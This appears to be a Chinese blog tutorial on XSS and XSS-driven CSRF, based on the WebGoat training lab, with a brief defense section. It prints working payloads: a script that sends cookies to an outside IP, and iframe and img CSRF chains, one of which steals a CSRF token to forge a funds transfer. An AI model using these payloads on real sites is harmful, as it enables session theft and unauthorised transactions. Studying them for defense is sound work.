XSS学习

最新推荐文章于 2024-06-26 11:54:12 发布
最新推荐文章于 2024-06-26 11:54:12 发布
阅读量282 收藏 1
点赞数
分类专栏: 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuqi7/article/details/78849656
版权

0x00 前言

看WebGoat的XSS部分总结的一部分东西,算是XSS入门
WebGoat的git地址:https://github.com/WebGoat/WebGoat/

0x01 概念

Cross Site Scripting, 跨站脚本攻击,将恶意脚本注入到可信网站,获取其他用户信息或权 限。由于缩写 CSS 一般认知为层叠样式表(Cascading Style Sheets),所以缩写为 XSS

0x02 种类

  1. Stored XSS(Persistent or Type-I XSS)
    存储, 再次访问触发
  2. Reflected XSS(Non-Persistent or Type-II XSS)
    直接触发
  3. DOM Based XSS(Type-0)
    在浏览器的解析中改变页面 DOM 树, 且恶意代码不在返回页 面源码中回显

注:12 年之前这么分,后来分成了 Client XSS 和 Server XSS

0x03 结合 WebGoat 的 XSS 实例介绍

Stored XSS Attacks

情景
一个公共的留言板,所有用户可发布留言,可查看留言
过程
A. 用户发布留言如下:
标题: hello(随意写)
内容: <script>alert("Hacked!");</script>
B. 用户浏览此留言,出现弹窗

Reflected XSS Attacks

情景
一个搜索框,输入内容之后回车,会提示 内容+搜索结果,如 搜索 hello,提示 hello 未找到
过程
输入<script>alert("Hacked!");</script>,回车,出现弹窗
类似输入
<script>alert(document.cookie);</script> 弹出 cookie
<script>alert(document.form.field2.value);</script> 弹出某个表单的 input 的值

DOM XSS Attacks

修改 dom 树
过程
构造如下 

<script> 
    Var img= document.createElement("img"); 
    img.src = "http://10.10.10.151:1234/a?" + escape(document.cookie); 
</script>

即可实现窃取 cookie 的目的

0x04 对 XSS 的防御

  1. 对输入进行过滤,对输出进行编码
    特殊字符编码:

    &-->&amp;
    <-->&lt;
    >-->&gt;
    "-->&quot;
    '-->&#x27;
    /-->&#x2F;
  2. 使用 httponly 保护 cookie,使 js 脚本不能读写 cookie

0x05 利用 XSS 实现 CSRF

CSRF,Cross Site Request Forgery, 跨站请求伪造,这里介绍通过 XSS 实现的 CSRF
攻击者构造一个特殊链接(或者特殊的 img 标签等), 然后发给受害者(想办法让这个链接出现在受害者的页面), 受害者点击之后(或者只要加载即可), 这个链接可能就会带着受害者的身份信 息发起一次受害者不知道的却已经授权的请求

最基本CSRF

伪造图片,实际上使受害者访问特定链接:
<img src="attack?Screen=XXX&menu=YYY&transferFunds=5000">
图片加载就会访问此链接

有消息回传的 CSRF

有提示的 CSRF, 也就是在 CSRF 被触发后, 会再触发一次请求传给攻击者, 提示漏洞已被 触发,或者说攻击已执行

  1. 使用 iframe 实现:
    html
    <iframe
    src="http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=5000"
    id="myFrame" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"
    onload="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=CONFIRM';">
    </iframe>
    <iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300">
    </iframe>
  2. 使用 img 实现:
    html
    <img
    src="http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=5
    000"
    onerror="document.getElementById('image2').src='http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=CONFIRM'">
    <img id="image2">

窃取Token的CSRF

有些表单提交会有 CSRF Token,用来防止 CSRF 攻击,如果足够了解受害者浏览页面,在 发动攻击的时候也可以窃取 Token 

<script> 
    var tokensuffix; 

    function readFrame1() { 
        var frameDoc = document.getElementById("frame1").contentDocument; 
        var form = frameDoc.getElementsByTagName("form")[0]; 
        tokensuffix = '&CSRFToken=' + form.CSRFToken.value; 

        loadFrame2(); 
    } 

    function loadFrame2() { 
        var testFrame = document.getElementById("frame2"); 
        testFrame.src = "http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=5000" + tokensuffix; 
    } 
</script> 

<iframe  
    src="http://localhost:8080/WebGoat/attack?Screen=XXX&menu=YYY&transferFunds=main"  
    onload="readFrame1();" id="frame1" 
    frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"> 
</iframe> 
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
xuqi7
关注
专栏目录
XSS学习大全
05-02
"XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的原理,掌握如何发现和修复此类漏洞,同时了解黑客如何利用它们进行攻击。通过学习,你将...
网络安全之从原理看懂XSS
Galaxy_0的博客
01-18 1565
网络安全之从原理看懂XSS
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了(2)
最新发布
Libra1313的博客
06-26 815
渗透测试-地基篇:该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 2127
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
【干货】XSS知识总结
hackzkaq的博客
10-27 6701
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
网络安全零基础之从原理看懂的XSS
jazzz98的博客
06-12 615
跨站脚本攻击 XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆
Xss学习研究平台源码.zip
05-12
在“Xss学习研究平台源码.zip”这个压缩包中,包含了一个用于学习和研究XSS攻击的测试平台。这个平台可以帮助开发者、安全研究员以及对网络安全感兴趣的人员深入理解XSS的工作原理,学习如何防御这种攻击。 XSS攻击...
那些年我们一起学XSS
02-21
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在...这个PDF教程将是你深入理解和掌握XSS攻击与防御的宝贵资源,通过学习,你可以提升网络安全意识,为网站提供更安全的用户体验。
基于机器学习建模的 XSS 攻击防范检测.docx
05-21
基于机器学习建模的 XSS 攻击防范检测.docx
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
为什么国际顶级黑客大都没学过计算机专业,而是自学成才?
weixin_57514792的博客
05-29 6319
为什么国际顶级黑客大都没学过计算机专业
程科学习xss
m0_58453883的博客
02-16 2913
1、XSS 介绍及分类 1.1XSS 漏洞介绍 XSS又称为跨站脚本攻击,XSS的重点不在于跨站点,而是在于脚本的执行,是一种经常出现在Web应用程序中的计算机安全漏洞,是Web应用程序对用户的输入、输出过滤不足而产生的,它允许攻击者将代码植入到提供给其它用户使用的页面中。 xss可以理解为一种注入。 注入,简单理解 就是 用户输入的数据,被插入到了前端页面当中(虽然有点抽象,但理解就行) 总结也就是 用户输入的数据,被当作了前端代码进行执行。 1.2反射型xss 反射型跨站脚本(Refle
网络安全必学知识点之 XSS
2301_77472496的博客
06-15 885
XSS 全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为 XSS。这是一种将任意 Javascript 代码插入到其他 Web 用户页面里执行以达到攻击目的的漏洞。
XSS详细讲解
liuqinhou的博客
06-06 4933
XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。转义" &quto;即转义掉双引号,'转义掉单引号,(另一个要注意的是实际上html的属性可以不包括引号,因此严格的说我们还需要对空格进行转义,但是这样会导致渲染的时候空格数不对,因此我们不转义空格,然后再写html属性的时候全部带上引号)这样属性就不会被提前关闭了。
【网络安全】XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1369
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS基础知识
m0_61361405的博客
03-13 1843
XSS漏洞产生的主要原因是由于程序对,导致构建的输入后,在前端浏览的时候被当作有效的代码从而产生危害。
xss漏洞学习
Z11762的博客
04-29 731
跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。原理:跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。特点:本质上是一种针对网站应用程序攻击的技术,同属于代码注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值